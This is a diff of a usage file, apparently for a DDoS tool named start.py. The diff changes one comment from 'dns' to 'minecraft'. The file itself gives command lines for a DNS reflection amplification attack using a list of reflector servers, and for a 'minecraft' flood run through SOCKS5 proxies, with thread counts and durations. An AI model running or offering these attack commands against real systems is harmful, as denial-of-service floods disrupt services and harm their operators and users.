Ootpsms/Otpsms/Usage-of-script.md

 # Running dns attack from 100 threads, for 3600 seconds
 # with reflector servers from dns.txt, for 3600 seconds
 python start.py dns 1.1.1.1:53 100 3600 dns.txt
-# Running dns attack from 1000 threads
+# Running minecraft attack from 1000 threads
 # with socks 5, for 3600 seconds
 python start.py minecraft 1.1.1.1:53 1000 3600 5 socks5.txt
 ```